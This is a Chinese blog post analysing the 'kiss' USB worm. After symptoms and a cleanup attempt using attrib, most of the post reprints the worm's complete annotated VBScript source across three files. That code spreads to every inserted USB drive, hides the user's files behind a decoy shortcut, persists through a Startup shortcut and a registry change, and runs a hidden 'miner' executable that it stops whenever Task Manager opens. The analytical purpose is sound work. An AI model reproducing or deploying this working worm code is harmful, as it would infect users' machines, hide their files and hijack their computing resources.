第一次u盘中病毒。。。有点兴奋,大半夜的不睡觉,只为了解这个病毒的特征。
U盘插入电脑以后,首先做出响应的是360,报毒,刚开始我没管360以为是误报,就把360关掉了,然后打开U盘,发现里面的文件一个也没少,但是后缀都多了exe,下意识的把.exe删掉,然后报错‘已有同名文件’,出现这种反常的情况,铁定中病毒了,弹出U盘重启电脑,发现电脑并没有受影响,结合病毒特征,去网上查了一下,和kiss病毒的特征基本吻合,真实的文件夹只不过是被隐藏了,并没有没删除,再有就是从U盘的剩余空间中可以发现文件并没有删除,那么就有恢复回来的可能。当然360做的确实不错,一键清除病毒。。。
360扫描结果:
特洛伊木马。。。
这个病毒确实不是很强劲,但是还有需要总结一下工作原理。
特征:
这种病毒会自动复制到U盘,被杀毒软件查杀的时候会把盘里所有文件夹属性改为——系统文件 隐藏。然后创建与文件夹同名的EXE文件,杀毒软件会删除这些EXE文件,造成文件被删除的假象。
解决方法:
先对U盘进行杀毒。 然后选择工具栏中“工具”——“文件夹选项”,再“查看”选项卡中的“高级设置”中,选择“显示所有文件和文件夹”选项,单击确定。
开始——运行——输入“cmd”——回车
把当前目录转到U盘下,比如你的U盘是F盘,就输入“F:”回车
输入:“dir/a” 回车,此时显示当前U盘下所有文件和文件夹。
输入:“attrib -a -s -r -h /d /s *.* ”回车
“attrib -a -s -r -h /d /s *.* ”的作用:(修改文件系统属性,,取消存档属性,取消系统属性,取消只读属性,取消隐藏属性,显示目录下所有文件的属性,将attrib和任意命令行选项应用到目录)所有隐藏的目录就都出现了。但是并没有什么用,弹出U盘后,在插上后,还是和原来一样。
Kiss源码:
入口:
%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
installer.vbs
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'查询硬盘事件
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
While True
'检查helper.vbs是否在执行,如果不在执行,则运行help.vbs
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")
'取出下一个事件
Set objEvent = colEvents.NextEvent
If objEvent.TargetInstance.DriveType = 2 Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
'一个新的U盘插入
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
'在U盘根目录下创建目的目录(\WindowsServices)
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 39
end if
'将四个病毒文件移动到目的目录
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
'在U盘根目录下创建打开movemenoreg.vbs文件的快捷方式
if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
link.windowstyle = 7
link.Save
End If
'在U盘根目录下创建名为‘-’的目录并隐藏
if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
End If
set check = objws.getFolder(device)
'将用户文件都移动到名为‘-’的目录下
Call checker(check)
End If
End If
Wend
sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select
Next
set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws. MoveFolder home, DummyFolder & "\"
End Select
Next
end sub
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
end sub
helper.vbs
on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'获得用户启动目录的路径
startupPath = ws.SpecialFolders("startup")
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
MyScript = "helper.vbs"
While True
'检查注册表是否已经修改,如果没有,则修改注册表启动项
key = Empty
key = ws.regread (nkey)
If (not IsEmpty(key)) then
ws.RegWrite nkey, 2, "REG_BINARY"
End if
If (not objws.fileexists(startupPath & "\helper.lnk")) then
'在启动目录创建helper.vbs的启动快捷方式
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
link.WorkingDirectory = strPath
link.Save
End If
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'检查installer.vbs文件是否在执行,如果不在则运行installer.vbs
call procheck(colProcess, "installer.vbs")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")
if colProcess.count = 0 And tskProcess.count = 0 then
'运行WindowsServices.exe
ws.Run miner, 0
ElseIf colProcess.count > 0 And tskProcess.count > 0 then
'如果用户打开了任务管理器,则杀掉WindowsServices.exe
For Each objProcess In colProcess
ws.run "taskkill /PID " & objProcess.ProcessId , 0
Next
end if
WScript.Sleep 3000
Wend
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strPath & procname & Chr(34)
end sub
movemenoreg.vbs
'发生错误时,程序继续执行下一句代码
on error resume next
'定义一系统变量
Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'获得WScript.Shell
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'打开根目录下名为‘-’的目录,也就是真正存放用户所有文件的目录
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'Chr(34)是双引号
ws.Run Chr(34) & pfolder & "\_" & Chr(34)
AppData = ws.ExpandEnvironmentStrings("%AppData%")
DestFolder = AppData & Target
'创建目标目录,也就是%AppData%\WindowsServices目录
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
end if
'将四个病毒文件复制到目标目录并隐藏,再将目标目录隐藏
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
'复制文件
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
'隐藏文件(39表示文件属性为归档、系统、隐藏)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'从任务管理器中查找helper.vbs是否已经运行,如果已经运行则退出当前脚本
For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next
'运行helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)
Set ws = Nothing